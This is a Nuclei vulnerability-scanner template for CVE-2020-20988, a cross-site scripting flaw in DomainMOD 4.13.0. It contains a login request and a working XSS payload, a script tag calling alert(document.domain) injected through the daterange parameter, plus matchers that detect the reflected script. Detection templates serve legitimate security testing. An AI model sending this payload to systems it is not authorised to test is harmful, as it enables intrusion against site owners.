nuclei-templates/cves/2020/CVE-2020-20988.yaml

50 lines
1.4 KiB
YAML

id: CVE-2020-20988
info:
name: DomainMOD 4.13.0 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the "or Expiring Between" parameter.
reference:
- https://mycvee.blogspot.com/p/xss2.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-20988
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-20988
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2020,domainmod,xss,authenticated
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
new_username={{username}}&new_password={{password}}
- |
POST /reporting/domains/cost-by-owner.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
cookie-reuse: true
req-condition: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(all_headers_2, "text/html")'
- 'contains(body_2, "value=\"\"/><script>alert(document.domain)</script>")'
- 'contains(body_2, "DomainMOD")'
condition: and
# Enhanced by mp on 2022/08/14